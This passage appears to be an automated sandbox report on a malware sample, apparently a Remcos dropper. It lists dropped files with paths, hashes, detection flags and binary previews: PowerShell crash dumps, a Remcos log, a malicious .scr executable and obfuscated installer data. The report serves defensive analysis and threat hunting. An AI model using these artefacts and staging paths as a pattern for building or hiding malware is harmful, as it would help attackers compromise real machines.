                                    SSDEEP:192:DV5Cie/85b0aQH0BjanOynkQ5vpXNZrHzuiFuZ24IO8T:Bcj/85oaQH0BjoOe5vpfzuiFuY4IO8T
                                    MD5:FE53A2AED36D412A2E53CD77F64220D7
                                    SHA1:3AC5737D9D8C59DAC7195F22E0A1DDCBFC208B0B
                                    SHA-256:F524D872ED4C717AB340075DF971D38673709AE6AA1E99E3246AD2E3B5E3A3DA
                                    SHA-512:E57F15796721356BDEAA8905683AA91CD1001E8A9E475DBE557F99143D11D193EB1D802B3E68AE11C26B6F90D2C9F562BBC710510644E7EA9384C1FD37CA8063
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.7.6.4.8.5.2.2.9.7.4.0.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.7.6.4.8.5.3.3.2.7.6.1.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.6.6.9.3.3.4.-.f.e.e.6.-.4.b.7.8.-.a.2.1.a.-.4.2.2.b.e.3.3.2.2.2.b.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.0.0.c.5.c.d.-.0.8.1.1.-.4.7.2.f.-.a.e.a.e.-.4.7.7.9.a.5.1.c.8.1.5.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.8.-.0.0.0.1.-.0.0.1.4.-.c.1.3.8.-.5.a.2.a.4.3.f.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.5.e.e.8.9.b.b.1.e.4.a.0.b.1.c.3.c.7.f.1.e.8.d.0.5.d.0.6.7.7.f.2.

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_eeb76350ac29bb3b486937f9169f68096e924e2_f469684b_7f1f26bb-646e-4a9e-9a4c-2cc29ba7ffaf\Report.wer

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.633513850317114
                                    Encrypted:false
                                    SSDEEP:384:9Oocj/x50wzVPjoOe5vpfzuiFJY4IO8T:JcjX0wzVPjoxffzuiFJY4IO8
                                    MD5:F3429702FFA7D044666FB9434E884333
                                    SHA1:AB0CD1A570CF377D28C91832B23C1889AF0ADEBA
                                    SHA-256:07081F9AE2760F5D91A0DB95B9753CEAE99C32B05B12E78AB00ED2F6AA482C95
                                    SHA-512:7350B06E78256E1FE42CC9E072613BF21E9CDFB2B5DF2CD3395774BE903653B4A015433E331337C0F23D99E305FF93BE56B955BE0D5249A3A88CFC6875A4DFAD
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.7.6.4.8.5.7.5.0.1.6.5.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.7.6.4.8.5.8.4.0.9.5.0.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.1.f.2.6.b.b.-.6.4.6.e.-.4.a.9.e.-.9.a.4.c.-.2.c.c.2.9.b.a.7.f.f.a.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.8.4.5.2.2.3.-.5.8.a.7.-.4.a.4.b.-.a.2.0.1.-.c.5.2.4.2.e.f.9.7.d.d.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.8.-.0.0.0.1.-.0.0.1.4.-.c.1.3.8.-.5.a.2.a.4.3.f.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.5.e.e.8.9.b.b.1.e.4.a.0.b.1.c.3.c.7.f.1.e.8.d.0.5.d.0.6.7.7.f.2.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER196F.tmp.dmp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Mon Sep 2 15:34:12 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):547646
                                    Entropy (8bit):3.6305405035605074
                                    Encrypted:false
                                    SSDEEP:6144:rsRJ9cB5MsrHkTgGtOEIFHLGzNTmrynDrEK4b4JbZ4:rsRJmBOsjkTJtOEIxLGzkr0DrEUZ4
                                    MD5:EA57451BC8F400FF062C951A2108B2A5
                                    SHA1:DEC92D78CB6517F703EA808A90F93E3EC5DB3240
                                    SHA-256:79A4A73480E220A86B376946183EC08C89D5D9472C274425D7D304BC3CC46262
                                    SHA-512:9CAFD188EF48D04065F198891FB0B6A22F1A18EA19EE81C6D678526BCD0B8A5E77ABB32E01F4DED4F8671E138BEFF6123F8C021C3634F1E0E5055D64B707E84A
                                    Malicious:false
                                    Preview:MDMP..a..... ..........f............T...........82..h............=......._..B...........`.......8...........T...............~............>...........@..............................................................................eJ......8A......GenuineIntel............T.......x......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C7D.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8364
                                    Entropy (8bit):3.6955830713505886
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJPt60F6YkISUJzqgmfMDwhPprd89bcAsfgUm:R6lXJ16e6YLSUtqgmfMDwhIcTfy
                                    MD5:9C2D9030B7EE4C809E48787638175F03
                                    SHA1:2470E48B57F75ABD2E77AD2ED05D1EBBBB43F0F9
                                    SHA-256:9BF7805EED267FF5177CCAE50A3B405E071FC5BBCBC6D57C04C79504CEC986FC
                                    SHA-512:F1A506F17C90A6DC0017D43443232EF08DFDDD184C105263291A09A1CA8560F1A93B51F0ABFF8AC081FF474625C4B1E117ED389CC1FF0A695F07B9FED1A63046
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.0.0.<./.P.i.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CBD.tmp.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4676
                                    Entropy (8bit):4.461102753491631
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zs6Jg77aI94TWpW8VYSYm8M4JQULWFkp+q8RtgWX7+Hd:uIjfII7qi7VKJQUPuGE7+Hd
                                    MD5:C4037E21BA46596E1B29A36F8E77700E
                                    SHA1:50B0D24E74FA9F2EE560F78BB6C896089B58150C
                                    SHA-256:E910D4C0BCFDFB720869519DA4EE4DCD05691B9BED441C296D983BFF931EBC61
                                    SHA-512:C97C5CD4E4508A79904D05BC240453D6DA77B6698F17A8C932BB994B3558A783803B5AFC3B1641A293973A3A44B8EA688525DBC3208E71C23D17B543E15A3044
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="482796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DB2.tmp.dmp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Mon Sep 2 15:34:17 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):527422
                                    Entropy (8bit):3.6737375742962417
                                    Encrypted:false
                                    SSDEEP:6144:Dguv4PjrVEK3TgG6YE4FHLGQj7mryTDrE+Bb4C:snLrV73TJ6YE4xLGQ+rIDrEa
                                    MD5:E22A4DA251C36A18CCFF00C4573D0DC1
                                    SHA1:612F4C35E01338BA9E8EA2A429C027CC9D99B2A8
                                    SHA-256:145729FFF0745155391295BEDADF8BE7F9384FD68745CC6E0E95A700D3B40308
                                    SHA-512:5D836E4C54A3CC1FE775C528717CB82715AFB0DCB9EDDF305C351108057EDED73A14F313175C2953A9EA7D0B6B778FEBD0281A574D54E5C521F4D6C0B04FEEF9
                                    Malicious:false
                                    Preview:MDMP..a..... ..........f............$...........82..8...........p=......4_..F...........`.......8...........T........... ................>..........p@..............................................................................eJ.......A......GenuineIntel............T.......x......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F98.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8350
                                    Entropy (8bit):3.6953671662456964
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJPsA6uc6YkiSUJzqgmfMDE3pD089bfAsf+OYVm:R6lXJb616YBSUtqgmfMDEDfTf+OH
                                    MD5:CED8533939D0510C1F1ECB698A5D88E4
                                    SHA1:78185361506EC2E944AA54B609FA5E9A7F464C3D
                                    SHA-256:CABFFC03C45F059B5615365F9C2C7B6F349C6F57C048C74BEB2FFDF0B9694A7B
                                    SHA-512:2C478A17D8953260A8CF3846DD90F39AA19CB5182018FE0F267D98CEBC43EF19685E53FEEFB51F5257AC2CE10C974DECB5D4D100FA11FE1617A6C47CFE48D027
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.0.0.<./.P.i.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FD7.tmp.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4676
                                    Entropy (8bit):4.462262477908439
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zs6Jg77aI94TWpW8VYmYm8M4JQULIFi+q8RHgWX7+Hd:uIjfII7qi7VyJQUXuAE7+Hd
                                    MD5:AA8EA88C3A6D9AB2983392FF3E80995D
                                    SHA1:CA1647A28FA2D9459AB0039A0918F61435796998
                                    SHA-256:6CF87BE65E0E94EF32A388E07D5C5597701D3B55B4B3514EE19EF9C61D0FE36D
                                    SHA-512:524092DA2D2978DC5FBBAC3CF92A6DA94C9B0191548574EEDFCDDDA8867B0D919E8DCC9A824ECC4AF23FBD329AA1B31C0D963012B24C129AD93991D46ADA0B0F
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="482796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                    C:\ProgramData\remcos\logs.dat

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):144
                                    Entropy (8bit):6.7202382826772995
                                    Encrypted:false
                                    SSDEEP:3:iynElHECO2xoCx3kUSTsKl+/ZSCXnJL+Xvpw2k2uq0lE1E79ZqRdPeCKN:i+A95xUUSTRwXJKBDeq0lE1E79ZEPeX
                                    MD5:8024497BFA1794517CA65FC0BB0AC37A
                                    SHA1:3AB426ACBCA1D17B6703235EED2342319452246E
                                    SHA-256:E767E44848B1C12581648E26F424CDB5E339676580B808E2EECC9EEEEC2D464C
                                    SHA-512:5EEF96165679C3003594E7F87BD78C5101AAD4E52CFDD235F3A7F2DB4587BB8015C90CF439B6AED9E4834E73335B1343DCB6812E49F1B951644DA9E91740DB59
                                    Malicious:true
                                    Preview:...UN.!.VX....5r...."..{.V.qT.`..g..I.J..1..G...:R(wC....,A..h.K.'..B.....p.n#K...................sz..a-..1.....X%{...tsV.wj..)iq.O. .rG.J(

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                    C:\Users\user\AppData\Local\Temp\Partivarerne.scr

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Category:dropped
                                    Size (bytes):469904
                                    Entropy (8bit):7.664240005553691
                                    Encrypted:false
                                    SSDEEP:12288:rKYi/LYz3kRV6h/3lObHOjeP/AxozXkYD:GFDg3ZhvlwHWiYx2UYD
                                    MD5:61BDBE7854F1572202F7916CF7F03616
                                    SHA1:E03A3385BC0CD5869C2A8CC72C80F4115B7B7945
                                    SHA-256:39F1703E13BDC112F4FFE9240F70CD5EB5B07CC218E6B22A8D58E4DCFAADD0A1
                                    SHA-512:B9B41EDE8456E65669DDF068BD6D277D60A7F2D233FA947636F998E9F77BC9BE72A4B27884C9CC1BB979BBC0A8488BA8EFA32375258492EB712ED864ECA3A9C6
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 53%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....c.W.................^...........0.......p....@..................................t....@.................................(t.......@...X...........................................................................p...............................text...[\.......^.................. ..`.rdata..F....p.......b..............@..@.data................v..............@....ndata.......@...........................rsrc....X...@...X...z..............@..@................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\Partivarerne.scr:Zone.Identifier

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Angiosperm.Sla

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):318391
                                    Entropy (8bit):7.697933383157832
                                    Encrypted:false
                                    SSDEEP:6144:Y0pdzZVmwH8552pWrL6dKhmOHuWKqWJepSQK9ETizjNIlVlDW6Vte:PdzPj85581KurXNqF7fe
                                    MD5:74C243E34B9FAFDD090165D998591C37
                                    SHA1:376964338A52695316FAD59455CD23269312CC21
                                    SHA-256:EA92D267A29EBEA630FC51E02B9E7C42683216B1B4BF1075063A58529657AB16
                                    SHA-512:4670D7E9EFE8D9738F9406E741991BF8E52DE94EAE4C202441E7C0457B4C120F6033893E4B1B1DDD69410EC3C39D8EDF3C86905CA41A7AAB1BD4B2FB9E06657C
                                    Malicious:false
                                    Preview:.....e.......dd..NNN.....FF...uu............................//............$$$...Q...............;..................................\..........&&.`............&&......f..........0.....h.........................6...................Q.....H....0.|.............\...d.....CCCCCC....LL............D...................a.....LLL......................................................[[[.&.........g.mm...........................aa...............2..............U...>...............kkk................::........]].>..nn..D........ff......1..B.......................................rrrr.[[[[.......p......FFFF.............................%......z.........%%................................{{.........YY.......................................uuu......S...q....bb.........................N....,,,,,........................{{{.m.............................EEE..}}}....vv.....>>>....................yyy...............%%......f........................wwwwww...O.......O................................................

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Donkraftes197.sax

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3241
                                    Entropy (8bit):4.944775379574013
                                    Encrypted:false
                                    SSDEEP:96:Q2ftN1sEMoxZkH07swucpg4PJAbZknQgEYmC:Q25sVoxZkU7swjJAbKr
                                    MD5:FFBF267C60266B56038D6F59A29667FE
                                    SHA1:6670DCFB19C1F662EEBB962C5C893E26BFDC6A3A
                                    SHA-256:92746E6CF37B022C9E65F638325D9A260109F8AD1CEFDCD9179023A8C43854BD
                                    SHA-512:1470D30B40F80EF601E0D8376FA43D868E05B812F56AA6CC214810C6723F2A44200EE518FDAC2637053E276A73603D3B89D204B7EBC96BAC47D38AB69D5799A0
                                    Malicious:false
                                    Preview:...c..5..I...........y.................5.....]..^..:.......mK............5....U.......+z...........k....'........................\........A...Y..y.......K.._._.................>...%...N.......O...N..~..r.................+d........y..j.Q.?....,.-...........f.#A..`.....[Z......W.+.........}.........#...+..v..<......5.]..............q.H.....]6dJ..t...............X...........3.m.Q.........R....Y.....\.....n.........................P.Y.W...].TW...u:.....p......ZVs........rK..M...t.{................`........&8...w.......F....ls......(.)..........u.........Q.............<.......c..T........g~....~.....9;.......q..o................Y........Y...-..<O...\.|....Hn...vc0.......F.^ry.......P...50.:.....$.....g....H....$......mf..HC..........j.....'(.....q...6..H.Kl...>.nN....i.............2.......r.|......Q.......K....B.~6.r......~..........wf..".1..'g.....Z..b...'.#...~....dm.....8.'.N..$....1..(..1...w.".......4......)...E............._.}.Y......s..+...........^.m.......Hi...l.[.&.

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Filmkundskabers209.kon

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3035
                                    Entropy (8bit):4.819231644130541
                                    Encrypted:false
                                    SSDEEP:48:k7rOdr6t8TunETI1nCNkmnngXenfywhjPvzmW3FdCv0EMgjM1O6z/:YiKPnQsnCNIXQ7Pr91dCv0ngg1O6z/
                                    MD5:697432AE88310017784E05283190C05B
                                    SHA1:0D82F0C883FF55A4847542AD6BFE7C78B6751630
                                    SHA-256:39DADB40165C61C25E858A914F037CDE54B6CA6E280E563C11E14E8EAA5F360E
                                    SHA-512:768C4181E3455E0C67E2277B70C674F5C960C1A3A92629D8768D090BB2D4D0E7A9F1EAB7A3D690A0BEE004867C13799CBAEFD99BF27B42961112D3EFFF5DA45F
                                    Malicious:false
                                    Preview:........8...c2J..7..l..x..M....C*........v....>.............r.....)[..,........i.(...............g.e......}.............#B......;X...zm.0....K...O..d......}./.....SM...y;..p.F./.............f....~+..%.... ..6....1......2.......|.......uj.x..........................b............g......R..Q...s..........c.........../.....R.....z:......Iy....B.qE.......3.......... Q...........}.......W........DU.........~...FO....Q...........x.......t........G?.......Bb..F...-..Z..B..D..{....Z.............|.OxJ..f:...@..........q............8....z...X....g...............s....T....r.....#.{.......N..<].<...i......z.....W....q.m............l...........E...............}......iI..u......!.........A....[...Z...0...-.........?..".......^..c.5..[.....g...........E.lT....Y.G'...a..#...IE..!.........n..........tm..y....Z....=............*...........................r......................(......"......N:....%Y....................o......J.3.....x.....o.U.....cR....6.....`...J......+....B.&..W..Z.........

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Henseende.ska

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2222
                                    Entropy (8bit):4.936428604121112
                                    Encrypted:false
                                    SSDEEP:48:qlPi2FAWuf1qnyfQY78osS6Dzld/6NLONulTXRHdrE7UpT:OPVFAWuAnUt7CJd/6NdB94YpT
                                    MD5:ACD3EA83BEA818BB3A99F3C9E9A1FD5E
                                    SHA1:9A7D6AB1713E6A20181F52EA1BCC2C0EADBF2D2C
                                    SHA-256:6BB38A6800A2E28AB2925EBAE75A5189FC3273186CD625117CAA436536F79EFA
                                    SHA-512:A1941147BA67E663D0F82719506E19BCD40EFB58D8D043DD03775E7EF68790FD9D56445DE3E4C7492DF969A01CE1C7B326A97760F943EBEBC1ADDAE5DFBBB859
                                    Malicious:false
                                    Preview:.....i...........!..............Y.........lo."..`..........v..F.6.....".Y.............1...%...v.........d....5......G.'.....c............O.0...............,...e............../.U.........d.........!............A(...j..wr...M^M...j...p,f..z...C...K.R......e....x+6...y.v....".....yP.o...............c.Y@.........x..H.F.>......%k......Aa...........l.......3...t......G.....x...............X.............K..f..J.8...%....N.........^..<........~.....zg...k..........&...g|..[y.....o.....B......B*.m......m..]..........1..m.....................t........](.....3...f.......W................n....U.v.S............m...A................9:0..\.f...d.W...d.....n...m..B.:.(...^0L..1K..O...|*....||.J.;.../...yt..=..........#.{.................../...... .......6..M............|..|.............x..............+..K........&...........f.{.<.1(..o........v|....._.M.........g.. .o.6....M......~.....B........^............+.... ...>................p.j........j..........2.....5..+.......Q....S....h.m

                                    C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Hospitaliseret.lba

                                    Download File
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2613
                                    Entropy (8bit):4.8894208961850865
                                    Encrypted:false
                                    SSDEEP:48:mjy/OfwtDzyfqeQL/AvKzMs2cIgeN21iDIe3+lAsngxMiPYUXv+3eKx:V/OfyWfqx/AvuMyIgevDulHngxMCYUvS
